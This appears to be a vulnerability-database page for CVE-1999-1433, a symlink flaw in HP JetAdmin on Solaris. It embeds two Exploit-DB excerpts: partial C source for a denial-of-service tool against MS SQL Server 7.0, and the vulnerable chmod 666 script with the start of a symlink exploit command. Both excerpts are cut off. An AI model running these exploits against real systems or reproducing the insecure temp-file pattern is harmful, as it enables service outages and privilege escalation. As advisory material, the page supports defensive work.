CVE-1999-1433
published 1998-07-15CVE-1999-1433: HP JetAdmin D.01.09 on Solaris allows local users to change the permissions of arbitrary files via a symlink attack on the /tmp/jetadmin.log file.
PriorityP419high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
0.94%
56.3th percentile
HP JetAdmin D.01.09 on Solaris allows local users to change the permissions of arbitrary files via a symlink attack on the /tmp/jetadmin.log file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | jetadmin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft SQL Server 7.0/7.0 SP1 - NULL Data Denial of Service
exploitdb·1999-11-19
CVE-1999-0999 Microsoft SQL Server 7.0/7.0 SP1 - NULL Data Denial of Service
Microsoft SQL Server 7.0/7.0 SP1 - NULL Data Denial of Service
---
// source: https://www.securityfocus.com/bid/817/info
If Microsoft SQL Server 7.0 receives a TDS header with three or more NULL bytes as data it will crash. The crash will generate an event in the log with ID 17055 "fatal exception EXCEPTION_ACCESS VIOLATION".
/*
** sqldos.c -- a DoS attack agains MS SQL Server
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 1433 /* the port SQL Server listens on */
int main(int argc, char *argv[])
{
int sockfd, numbytes;
struct hostent *he;
char buff[65535];
struct sockaddr_in target_addr;
if (argc != 2) {
fprintf(stderr,"Usage: sqldos target\n");
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL)
perror("gethostbyname");
exit(1);
}
if (
Exploit-DB
HP JetAdmin 1.0.9 Rev. D - symlink
exploitdb·1998-07-15
CVE-1999-1433 HP JetAdmin 1.0.9 Rev. D - symlink
HP JetAdmin 1.0.9 Rev. D - symlink
---
source: https://www.securityfocus.com/bid/157/info
A vulnerability exists in HP's JetAdmin Rev. D.01.09 software. Due to its failure to check if it is following a symbolic link, it is possible for an attacker to create a link from /tmp/jetadmin.log to anywhere on the filesystem, with permissions for reading and writing by everyone on the system. This can be used to gain root access.
The problem lies in the checking and creation of the log file. The following snippit is from /opt/hpnp/admin/jetadmin.
----
LOG=$TMP/jetadmin.log
if [ ! -f "$LOG" ]
then
touch $LOG
chmod 666 $LOG
fi
----
If the log file does not exist, the jetadmin script will create it, and change its permissions to 666. It does not check if the file is a symbolic link.
ln -sf /.rh
No writeups or analysis indexed.
1998-07-15
Published